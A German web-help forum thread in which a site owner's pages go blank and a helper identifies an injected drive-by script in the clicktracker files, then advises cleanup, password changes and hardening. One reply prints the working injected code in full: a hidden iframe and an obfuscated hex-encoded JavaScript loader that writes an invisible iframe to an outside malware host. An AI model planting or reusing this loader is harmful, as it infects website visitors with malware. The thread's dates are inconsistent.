Gruppen
- Top Gruppen
- Betriebsysteme
- Windows classik
- Linux
- BS-Sonstige
- Software
- Datenbanken
- Bildbearbeitung
- Audio/mp3/Video
- Security/Viren
- SW-Sonstige
- Hardware
- Mainboard/CPU
- Grafikkarten
- Peripherie
- Laptop/Notebook
- HW-Sonstiges
- Netzwerk
- Telefon,ISDN,Modem
- W-Lan
- NW-Sonstiges
- Programmierung
- PHP,ASP,Perl...
- Java,C++...
- Webseiten/HTML
- Sonstiges
- PC-Sonstiges
- Plauderecke
- SN Intern
- Test
/ Forum / Webseiten/HTML
Webseiten/HTML
Fragevon coros vom 09.03.2020, 20:04 Options
Homepageseiten werden nach Anwahl nicht mehr angezeigt & Server absichern
Hallo Leute,
ich habe ein enormes Problem mit meiner Homepage. Es werden keine Seiten mehr angzeigt. Wenn ich z.B. die Adresse
*xxxxxxxxx*
eintrage, bekomme ich nur eine leere Seite. Das ist bei allen Seiten so. Kann mir jemand einen Tipp geben, woran das liegen könnte, bzw. wonach ich schauen müsste?
Ich habe erst mal eine alte Version der Homepageseiten eingespielt, bei denen die Anwahl nicht über den clicktracker gezählt wird, damit man die Seiten erreichen kann.
Danke Euch,
Oliver
ich habe ein enormes Problem mit meiner Homepage. Es werden keine Seiten mehr angzeigt. Wenn ich z.B. die Adresse
*xxxxxxxxx*
eintrage, bekomme ich nur eine leere Seite. Das ist bei allen Seiten so. Kann mir jemand einen Tipp geben, woran das liegen könnte, bzw. wonach ich schauen müsste?
Ich habe erst mal eine alte Version der Homepageseiten eingespielt, bei denen die Anwahl nicht über den clicktracker gezählt wird, damit man die Seiten erreichen kann.
Danke Euch,
Oliver
Antwort 1 von Mickey vom 09.03.2020, 20:18 Options
Bei aktiviertem Javascript habe ich hier die KAV Meldung
09.03.2008 20:05:18 Das Öffnen des schädlichen HTTP-Objekts <hxxp://77.221.xxx.xxx.if/go.html?1010689e582087924>: Zugriff blockiert.
Hier wird von einer *.ru Seite ein Virus/ Trojaner zum Download angeboten. Ich hab deinen Link (schau dir mal deinen Quelltext an) oben erstmal raus, Infos zu der gexxxten IP findest du in meinem Link unten.
Edit: scan deinen Rechner auch mal, und schau ob du folgende Dateien findest: info.exe, ntos.exe, banker.info
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
09.03.2008 20:05:18 Das Öffnen des schädlichen HTTP-Objekts <hxxp://77.221.xxx.xxx.if/go.html?1010689e582087924>: Zugriff blockiert.
Hier wird von einer *.ru Seite ein Virus/ Trojaner zum Download angeboten. Ich hab deinen Link (schau dir mal deinen Quelltext an) oben erstmal raus, Infos zu der gexxxten IP findest du in meinem Link unten.
Edit: scan deinen Rechner auch mal, und schau ob du folgende Dateien findest: info.exe, ntos.exe, banker.info
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Antwort 2 von coros vom 09.03.2020, 21:00 Options
Hallo Mickey,
danke Dir erst mal für die Antwort. Ich habe auf meinem Rechner geschaut, aber keine der von Dir aufgeführten Dateien gefunden.
Was muss ich denn nun machen, damit ich diesen Trojahner wieder von meiner Homepage wegbekomme?
Gruß,
Oliver
danke Dir erst mal für die Antwort. Ich habe auf meinem Rechner geschaut, aber keine der von Dir aufgeführten Dateien gefunden.
Was muss ich denn nun machen, damit ich diesen Trojahner wieder von meiner Homepage wegbekomme?
Gruß,
Oliver
Antwort 3 von Mickey vom 09.03.2020, 21:25 Options
Deine Webseite ohne das hinterlegte Script hochladen, und den Webspace auf jeden Fall besser absichern. Du siehst im Quelltext, dass ein Iframe, ein obfuscated Script, geladen wird mit dem Code.
Eventuell hat jemand Zugriff auf deinen Server gehabt und dieses Iframe hinterlegt. Das Script siehst du ja im Quelltext des gelöschten Links. Informiere deinen Webhoster, und auch Ripe.net solltest du zu der IP informieren.
Übrigens: es muß nichts auf deinem PC zu finden sein, das Problem ist ja dein Webspace.
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Eventuell hat jemand Zugriff auf deinen Server gehabt und dieses Iframe hinterlegt. Das Script siehst du ja im Quelltext des gelöschten Links. Informiere deinen Webhoster, und auch Ripe.net solltest du zu der IP informieren.
Übrigens: es muß nichts auf deinem PC zu finden sein, das Problem ist ja dein Webspace.
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Antwort 4 von coros vom 09.03.2020, 21:35 Options
Hallo Mickey,
danke Dir für Deine Antwort. Im Moment verstehe ich nur Bahnhof. Ohne welches Script soll ich meine Webseite hochladen?
Wie sichere ich etwas so etwas besser ab?
In welchem Quelltext sehe ich was?
Sorry, dass ich so dumm frage, aber mein Wissen bezüglich Webseiten ist eher gering, wie man ja jetzt sieht....
Gruß,
Kasimir
danke Dir für Deine Antwort. Im Moment verstehe ich nur Bahnhof. Ohne welches Script soll ich meine Webseite hochladen?
Wie sichere ich etwas so etwas besser ab?
In welchem Quelltext sehe ich was?
Sorry, dass ich so dumm frage, aber mein Wissen bezüglich Webseiten ist eher gering, wie man ja jetzt sieht....
Gruß,
Kasimir
Antwort 5 von Mickey vom 09.03.2020, 21:42 OptionsLösung
Unter Ansicht - Quelltext in deinem Browser (gelöschter Link) findest du folgendes Script:
<iframe src='http://url' width='1' height='1' style='visibility:hidden;'></iframe>
<script>function v475ce233c3aee(v475ce233c3f29)
{
function v475ce233c46e9 ()
{
var v475ce233c500d=16;
return v475ce233c500d;
}
return(parseInt(v475ce233c3f29,v475ce233c46e9()));
}
function v475ce233c56c4(v475ce233c5eb8)
{
var v475ce233c66b0='';
for(v475ce233c6f13=0; v475ce233c6f13<v475ce233c5eb8.length; v475ce233c6f13+=2)
{
v475ce233c66b0+=(String.fromCharCode(v475ce233c3aee(v47 5ce233c5eb8.substr(v475ce233c6f13, 2))));
}
return v475ce233c66b0;
}
document.write(v475ce233c56c4('3C5343524950543E77696 E646F772E7374617475733D27446F6E6-5273B646F63756D 656E742E777269746528273C696672616D65206E616D653 D383933303837632073-72633D5C27687474703A2F2F3737 2E3232312E3133332E3138382F2E69662F676F2E68746D6C 3F272B-4D6174682E726F756E64284D6174682E72616E646 F6D28292A3332373534292B273831636166313339-6430305 C272077696474683D313036206865696768743D333039207 374796C653D5C27646973706C61-793A206E6F6E655C273 E3C2F696672616D653E27293C2F5343524950543E'));
</script>
Ändere deine Passwörter, informiere deinen Webhoster, und prüf deine Seite vor einem erneuten hochladen auf das Script in den index.html/ index.php Dateien. Die kannst du ja mit jedem HTML-Editor anschauen und prüfen.
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
<iframe src='http://url' width='1' height='1' style='visibility:hidden;'></iframe>
<script>function v475ce233c3aee(v475ce233c3f29)
{
function v475ce233c46e9 ()
{
var v475ce233c500d=16;
return v475ce233c500d;
}
return(parseInt(v475ce233c3f29,v475ce233c46e9()));
}
function v475ce233c56c4(v475ce233c5eb8)
{
var v475ce233c66b0='';
for(v475ce233c6f13=0; v475ce233c6f13<v475ce233c5eb8.length; v475ce233c6f13+=2)
{
v475ce233c66b0+=(String.fromCharCode(v475ce233c3aee(v47 5ce233c5eb8.substr(v475ce233c6f13, 2))));
}
return v475ce233c66b0;
}
document.write(v475ce233c56c4('3C5343524950543E77696 E646F772E7374617475733D27446F6E6-5273B646F63756D 656E742E777269746528273C696672616D65206E616D653 D383933303837632073-72633D5C27687474703A2F2F3737 2E3232312E3133332E3138382F2E69662F676F2E68746D6C 3F272B-4D6174682E726F756E64284D6174682E72616E646 F6D28292A3332373534292B273831636166313339-6430305 C272077696474683D313036206865696768743D333039207 374796C653D5C27646973706C61-793A206E6F6E655C273 E3C2F696672616D653E27293C2F5343524950543E'));
</script>
Ändere deine Passwörter, informiere deinen Webhoster, und prüf deine Seite vor einem erneuten hochladen auf das Script in den index.html/ index.php Dateien. Die kannst du ja mit jedem HTML-Editor anschauen und prüfen.
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Antwort 6 von coros vom 10.03.2020, 07:35 Options
Hallo Mickey,
danke Dir für Deine Antwort. Ich habe nun auch den Bereich gefunden, der dafür verantwortlich war. Es handelte sich um die Datei index.php und main.php des Bereiches, der für das Zählen der Klicks verantwortlich ist (im Verzeichnis "clicktracker").
Meine Frage nun, wie konnte dass passieren, dass diese Dateien geändert wurden und wie kann ich vorgehen, damit soetwas nicht nocheinmal passiert?
Danke Dir und Gruß,
Oliver
danke Dir für Deine Antwort. Ich habe nun auch den Bereich gefunden, der dafür verantwortlich war. Es handelte sich um die Datei index.php und main.php des Bereiches, der für das Zählen der Klicks verantwortlich ist (im Verzeichnis "clicktracker").
Meine Frage nun, wie konnte dass passieren, dass diese Dateien geändert wurden und wie kann ich vorgehen, damit soetwas nicht nocheinmal passiert?
Danke Dir und Gruß,
Oliver
Antwort 7 von Mickey vom 10.03.2020, 09:57 Options
Das war ein Script um Malware auf das System deiner Besucher zu laden. Weise diese auch jetzt noch darauf hin, ihre Systeme auf Malwarebefall hin zu untersuchen, sollten die deine Seite in der letzten Zeit besucht haben.
Poste doch bitte mehr Infos zu deiner Seite. Ist das ein eigener Server, oder ein Webhostingpaket bei welchem Provider. Wie sieht es mit den Rechten aus, etc. Man müsste auch die Originalseite kennen um zu sehen wo sie kompromittiert wurde.
Ein paar allgemeine Links zum anlesen, bei mehr Infos zu deiner Seite kann man dann auch auf detaillierte Fragen eingehen, da finden sich hier sicher noch Spezialisten:
PHP-Anwendungen individuell absichern
Sicherheit bei PHP-basierenden Applikationen
Webserver absichern mit der Apache Firewall
Linux-Webserver absichern und Hacker-Attacken abwehren
FreeBSD - Server absichern
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Poste doch bitte mehr Infos zu deiner Seite. Ist das ein eigener Server, oder ein Webhostingpaket bei welchem Provider. Wie sieht es mit den Rechten aus, etc. Man müsste auch die Originalseite kennen um zu sehen wo sie kompromittiert wurde.
Ein paar allgemeine Links zum anlesen, bei mehr Infos zu deiner Seite kann man dann auch auf detaillierte Fragen eingehen, da finden sich hier sicher noch Spezialisten:
PHP-Anwendungen individuell absichern
Sicherheit bei PHP-basierenden Applikationen
Webserver absichern mit der Apache Firewall
Linux-Webserver absichern und Hacker-Attacken abwehren
FreeBSD - Server absichern
Gruss,
Mic
Bei Eingriffen ins System, die Registry oder Dateien erst eine Sicherung vornehmen©
Antwort 8 von coros vom 10.03.2020, 18:26 Options
Hallo Mic,
sorry, dass ich erst jetzt antworte, aber ich war den geanzen Tag verhindert.
Die Webseiten liegen alle bei 1&1 auf einem Server. Ich habe dort einen Webhostingvertrag.
Was meinst Du mit
Welche Informationen benötigst Du?
Die Links werde ich mir heute abend durchlesen. Eventuell helfen Siemir ja.
Nochmal danke und Gruß,
Oliver
sorry, dass ich erst jetzt antworte, aber ich war den geanzen Tag verhindert.
Die Webseiten liegen alle bei 1&1 auf einem Server. Ich habe dort einen Webhostingvertrag.
Was meinst Du mit
Zitat:
Man müsste auch die Originalseite kennen um zu sehen wo sie kompromittiert wurde.
?Man müsste auch die Originalseite kennen um zu sehen wo sie kompromittiert wurde.
Welche Informationen benötigst Du?
Die Links werde ich mir heute abend durchlesen. Eventuell helfen Siemir ja.
Nochmal danke und Gruß,
Oliver
Ähnliche Themen
W-Lan rouer absichern
Sharkattack 27.02.2007 - 91 Hits - 2 Antworten
Copyright-Jahreszahl automatisch aktualisieren
coros 07.03.2007 - 460 Hits - 5 Antworten
Hilfe - Benötige Treiber für Karte von Pinnacle
Kay789 28.10.2007 - 525 Hits - 6 Antworten
ab wieviel buchstaben greift die suche?
1418 30.10.2007 - 99 Hits - 8 Antworten
Hinweis
Diese Frage ist schon etwas älter, Sie können daher nicht mehr auf sie antworten. Sollte Ihre Frage noch nicht gelöst sein, stellen Sie einfach eine neue Frage im Forum..
Neue Einträge
